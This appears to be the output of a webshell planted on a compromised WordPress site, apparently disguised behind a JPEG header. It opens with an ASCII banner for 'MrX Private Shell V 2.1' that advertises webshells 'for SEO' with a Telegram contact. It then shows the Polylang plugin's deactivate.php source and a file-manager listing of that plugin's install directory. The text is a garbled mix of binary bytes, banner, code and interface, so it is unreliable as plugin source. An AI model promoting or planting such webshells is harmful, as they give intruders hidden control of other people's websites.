����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Polylang
*
* /!\ THE CONSTANTS `POLYLANG_BASENAME` AND `POLYLANG_VERSION` MUST BE DEFINED.
*/
/**
* Deactivation class compatible with multisite.
*
* @since 3.8
*/
class PLL_Deactivate extends PLL_Abstract_Deactivate {
/**
* The process to run on plugin deactivation.
*
* @since 0.5
* @since 3.8 Moved from the class `PLL_Install`.
* Renamed from `_deactivate()`.
* Made it `static`.
*
* @return void
*/
protected static function process(): void {
delete_option( 'rewrite_rules' ); // Don't use flush_rewrite_rules at network activation. See #32471.
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| abstract-activable.php | File | 1.67 KB | 0644 |
|
| abstract-activate.php | File | 1015 B | 0644 |
|
| abstract-deactivate.php | File | 949 B | 0644 |
|
| activate.php | File | 1.91 KB | 0644 |
|
| deactivate.php | File | 629 B | 0644 |
|
| plugin-updater.php | File | 21.53 KB | 0644 |
|
| t15s.php | File | 5.89 KB | 0644 |
|
| upgrade.php | File | 9.18 KB | 0644 |
|
| usable.php | File | 3.08 KB | 0644 |
|